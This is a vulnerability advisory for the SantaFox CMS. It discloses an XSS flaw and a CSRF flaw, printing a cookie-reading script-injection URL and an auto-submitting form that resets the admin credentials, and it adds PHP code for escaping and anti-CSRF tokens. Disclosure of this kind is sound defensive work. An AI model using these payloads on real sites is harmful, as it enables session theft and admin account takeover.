High-Tech Bridge advisory HTB22593
History: Aug 23, 2010 - 12:00 a.m.

Multiple Vulnerabilities in SantaFox

2010-08-23 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.003 (Low); Percentile: 71.3%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SantaFox which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

  1. Cross-site scripting (XSS) vulnerability in SantaFox: CVE-2010-3463
    The vulnerability exists due to an input sanitization error in the "search" parameter in modules/search/search.class.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface.
    Exploitation example:
    http://host/search.html?search=1"><script>alert(document.cookie)</script>&x=0&y=0

  2. Cross-site request forgery (CSRF) in SantaFox: CVE-2010-3464
    The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and change the administrator's credentials.
    Exploitation example:
    <form action="http://host/admin/index.php?action=set_left_menu&amp;leftmenu=save_admin&amp;id=-1" method="post" name="main">
    <input type="hidden" name="login" value="Admin" />
    <input type="hidden" name="full_name" value="Admin" />
    <input type="hidden" name="pass" value="Admin" />
    <input type="hidden" name="lang" value="en" />
    <input type="hidden" name="codepage" value="" />
    <input type="hidden" name="enabled" value="on" />
    <input type="hidden" name="select_group[1]" value="on" />
    <input type="hidden" name="select_group[2]" value="on" />
    </form>
    <script>
    document.main.submit();
    </script>
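The two server-side fixes that close these findings, as an added example in PHP that is not SantaFox's own code: output encoding for the reflected "search" value (finding 1) and a per-session anti-CSRF token checked on every state-changing admin request (finding 2). Function names, the $_SESSION key and the constructed inputs are assumptions for illustration.

```php
<?php
// Added example, not SantaFox code. Function names and session layout are assumed.

// Finding 1: a reflected parameter must be encoded for the HTML context it is
// printed into. ENT_QUOTES also encodes the double quote that the advisory's
// payload relies on to break out of an attribute value.
function html_escape(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Finding 2: a state-changing admin action must prove the request was issued
// from a form the application itself rendered. A random per-session token is
// embedded in the form; a page on another origin cannot read it, so the
// auto-submitted cross-site form in the advisory arrives without it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; returns false when no token was ever issued.
function csrf_check(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Hidden field to add to the admin form, so admin/index.php can call csrf_check($_POST).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . html_escape(csrf_token()) . '" />';
}

// Demonstration on constructed input; runs from the CLI without a web server.
session_start();

$payload = '1"><script>alert(document.cookie)</script>';   // constructed, mirrors the advisory
echo html_escape($payload), "\n";                           // no longer parsed as markup

$forged = ['login' => 'Admin', 'pass' => 'Admin'];          // the advisory's form: no token
var_dump(csrf_check($forged));                               // rejected

$legit = $forged + ['csrf_token' => csrf_token()];          // form rendered with csrf_field()
var_dump(csrf_check($legit));                                // accepted
```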

CPE Name   Operator   Version
santafox   le         2.02

